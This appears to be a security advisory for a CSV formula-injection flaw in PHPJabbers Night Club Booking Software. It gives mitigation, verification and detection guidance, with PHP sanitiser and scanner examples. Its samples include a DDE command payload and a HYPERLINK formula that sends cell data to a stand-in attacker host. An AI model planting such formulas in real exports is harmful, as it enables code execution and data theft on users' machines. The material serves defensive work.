CVE-2023-51320
📋 TL;DR
PHPJabbers Night Club Booking Software v1.0 has a CSV injection vulnerability in the Labels parameters of the Languages section. Values stored there are written unsanitised into exported CSV files, so anyone who can edit labels can plant spreadsheet formulas in the export. When another user opens that CSV in a spreadsheet application such as Excel, the formulas are evaluated; depending on the application's settings they can launch commands through DDE or exfiltrate cell contents through external links, potentially leading to code execution on the user's machine. All installations of v1.0 are affected.
💻 Affected Systems
- PHPJabbers Night Club Booking Software
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution on the workstation of the user who opens the exported CSV, if their spreadsheet application still evaluates DDE or external-command formulas; this can lead to full compromise of that client system.
Likely Case
Data exfiltration (for example a HYPERLINK-style formula that sends cell contents to an attacker-controlled URL), client-side code execution, or denial of service when users open exported files.
If Mitigated
Limited impact if exported files are opened in applications that do not evaluate formulas (or that block DDE and external links by default), or if the export neutralises formula-leading characters before writing them.
🎯 Exploit Status
Exploitation requires authenticated access to edit the Languages section Labels parameters, plus a second user who exports the CSV and opens it in a spreadsheet application that evaluates the injected formula. No public exploit is needed beyond the payload string itself.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None found
Restart Required: No
Instructions:
No official patch available. Implement input validation and sanitization for CSV export functionality.
🔧 Temporary Workarounds
Input Validation for CSV Export
Implement server-side validation for the Languages section Labels parameters before they are stored or exported.
Do not rely on htmlspecialchars(): it is an HTML output encoder that leaves =, +, -, @ and tab untouched and does nothing against formula injection. Instead reject or flag values whose first non-space character is one of those, e.g. preg_match('/^ *[=+\-@\t\r]/', $input)
Validate input against an allowed character pattern for labels (letters, digits, spaces and ordinary punctuation) where the application permits it.
CSV Output Sanitization
Neutralise formula-leading cells at export time: if a field's first non-space character is =, +, -, @, tab or carriage return, prefix it with a single quote so spreadsheet applications treat it as text, then enclose the field in double quotes and double any embedded double quotes.
Modify CSV generation: $sanitized_value = preg_match('/^ *[=+\-@\t\r]/', $value) ? "'" . $value : $value;
Apply to every user-controlled field in CSV exports, not only the Labels parameters. Prefixing every field unconditionally also works but turns numeric columns into text.
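The two workarounds above combined into one export routine, as an added example that is not PHPJabbers' own code. It assumes a generic CSV writer fed with label rows; the function names and the sample labels are constructed for illustration. The key point it shows is ordering: fputcsv() handles delimiter and quote escaping but knows nothing about formulas, so the single-quote prefix has to be applied before the row reaches it.

```php
<?php
declare(strict_types=1);

// Added example, not PHPJabbers code: neutralising formula injection in a
// CSV export such as the Languages > Labels download. Function names and the
// sample label rows below are assumptions / constructed data.

/**
 * True when a spreadsheet would evaluate the cell as a formula: after any
 * leading spaces it starts with =, +, -, @, tab or carriage return.
 * Plain numbers such as "-5" are exempted so numeric columns stay numeric.
 */
function isFormulaLike(string $value): bool
{
    $stripped = ltrim($value, ' ');
    if ($stripped === '' || is_numeric($stripped)) {
        return false;
    }
    return strpos("=+-@\t\r", $stripped[0]) !== false;
}

/**
 * Prefix a formula-like cell with a single quote so the spreadsheet treats
 * it as text. Excel's CSV import shows the apostrophe; that is the accepted
 * trade-off, the cell is inert either way.
 */
function neutraliseFormula(string $value): string
{
    return isFormulaLike($value) ? "'" . $value : $value;
}

/**
 * Write rows with fputcsv(), which quotes fields containing the delimiter,
 * newlines or quotes and doubles embedded quotes, but does nothing about
 * formulas: the prefix step above must run first. The empty escape
 * parameter (PHP >= 7.4) gives plain RFC 4180 output.
 */
function writeSafeCsv($stream, array $rows): void
{
    foreach ($rows as $row) {
        $safe = array_map(
            static fn ($cell): string => neutraliseFormula((string) $cell),
            $row
        );
        fputcsv($stream, $safe, ',', '"', '');
    }
}

// Constructed sample: what an attacker with access to the Labels field
// might have stored, next to ordinary label values.
$rows = [
    ['key', 'value'],
    ['lbl_book',  'Book a table'],
    ['lbl_price', '-5'],
    ['lbl_hdr',   "=cmd|' /C calc'!A0"],
    ['lbl_link',  '@SUM(1+1)'],
    ['lbl_quote', 'Say "hi", then =1+1'],
];

$out = fopen('php://memory', 'w+');
writeSafeCsv($out, $rows);
rewind($out);
echo stream_get_contents($out);
fclose($out);
```

Run it with php on the command line and read the output in a text editor: the lbl_hdr and lbl_link cells come out with a leading apostrophe, lbl_price stays a bare -5, and the embedded quotes in lbl_quote are doubled inside an enclosed field. The "=1+1" in the middle of lbl_quote is harmless because only the first character of a cell decides whether a spreadsheet evaluates it.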
🧯 If You Can't Patch
- Restrict access to System Options > Languages section to trusted administrators only
- Educate users to never open CSV files from untrusted sources in spreadsheet applications that execute formulas
🔍 How to Verify
Check if Vulnerable:
On a non-production copy, enter a benign formula payload such as =1+1 (the canonical DDE probe =cmd|' /C calc'!A0 works too, but only open the result in a text editor, never in a spreadsheet with DDE enabled) in a Languages section Labels parameter, export the CSV, and inspect the file. If the field starts with a bare = the export is vulnerable.
Check Version:
Check software version in admin panel or readme files
Verify Fix Applied:
Verify in a text editor that exported fields beginning with =, +, -, @, tab or carriage return are prefixed with a single quote (or otherwise neutralised) and enclosed in double quotes; then confirm in a spreadsheet application that the cell displays as text rather than being evaluated.
📡 Detection & Monitoring
Log Indicators:
- Unusual CSV export requests, e.g. from accounts that do not normally export or at odd hours
- Repeated or failed CSV generation attempts, which can indicate an attacker iterating on a payload
- Label values saved with a leading =, +, -, @, tab or carriage return (visible in the database, or in request bodies if those are logged)
- Admin panel access from unusual IPs
Network Indicators:
- CSV file downloads containing formula patterns
- Unusual traffic to CSV export endpoints
SIEM Query (the URI paths below are placeholders; substitute the export and Languages endpoints of your installation):
source="web_server" AND (uri="/admin/export_csv" OR uri="/admin/languages") AND (status=200 OR status=500)
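The "CSV file downloads containing formula patterns" indicator above needs something that actually inspects the file content, which a URI-based SIEM query cannot do. Below is an added example scanner, not part of the product or of any vendor tooling: it parses a captured CSV export (from a proxy capture, a mail attachment, or the export endpoint itself), reports every formula-like cell, and gives a rough triage of what the formula is trying to do. The CSV text and the attacker.example host in it are constructed sample data; the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not part of the product: scan a captured CSV download and
// report cells that a spreadsheet would evaluate. Sample data is constructed.

/** Leading =, +, -, @, tab or CR after optional spaces; plain numbers exempt. */
function isFormulaLike(string $value): bool
{
    $stripped = ltrim($value, ' ');
    if ($stripped === '' || is_numeric($stripped)) {
        return false;
    }
    return strpos("=+-@\t\r", $stripped[0]) !== false;
}

/** Rough triage of what a formula-like cell is trying to do. */
function classifyFormula(string $cell): string
{
    $upper = strtoupper($cell);
    if (preg_match('/\|.*!/', $upper)) {               // DDE shape: app|'args'!cell
        return 'dde-command';
    }
    if (preg_match('/HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA/', $upper)) {
        return 'exfiltration';
    }
    return 'formula';
}

/**
 * Parse with fgetcsv() so enclosed cells containing commas or newlines are
 * handled correctly, and return one hit per formula-like cell with 1-based
 * row/column. Cells already neutralised with a leading single quote are
 * not reported, which makes this usable as a post-fix check as well.
 */
function findFormulaCells(string $csv): array
{
    $hits = [];
    $stream = fopen('php://memory', 'w+');
    fwrite($stream, $csv);
    rewind($stream);
    $row = 0;
    while (($cells = fgetcsv($stream, 0, ',', '"', '')) !== false) {
        $row++;
        foreach ($cells as $col => $cell) {
            $cell = (string) $cell;            // a blank line yields [null]
            if (isFormulaLike($cell)) {
                $hits[] = [
                    'row'   => $row,
                    'col'   => $col + 1,
                    'kind'  => classifyFormula($cell),
                    'value' => $cell,
                ];
            }
        }
    }
    fclose($stream);
    return $hits;
}

// Constructed sample export: one neutralised cell, one DDE payload, one
// exfiltration attempt, a negative number, and an enclosed multi-line label.
$sample = "key,value\n"
    . "lbl_book,\"Book a table\"\n"
    . "lbl_safe,'=1+1\n"
    . "lbl_hdr,\"=cmd|' /C calc'!A0\"\n"
    . "lbl_link,\"=HYPERLINK(\"\"http://attacker.example/?\"\"&A1,\"\"click\"\")\"\n"
    . "lbl_price,-5\n"
    . "lbl_multi,\"line one\nline two\"\n";

foreach (findFormulaCells($sample) as $hit) {
    printf("row %d col %d [%s]: %s\n", $hit['row'], $hit['col'], $hit['kind'], $hit['value']);
}
```

Only the lbl_hdr and lbl_link rows are reported (as dde-command and exfiltration respectively); the neutralised lbl_safe cell, the -5 price and the multi-line label pass. Point findFormulaCells() at the body of each response from the export endpoint, or at the files a proxy has captured, and alert on any hit whose kind is dde-command or exfiltration.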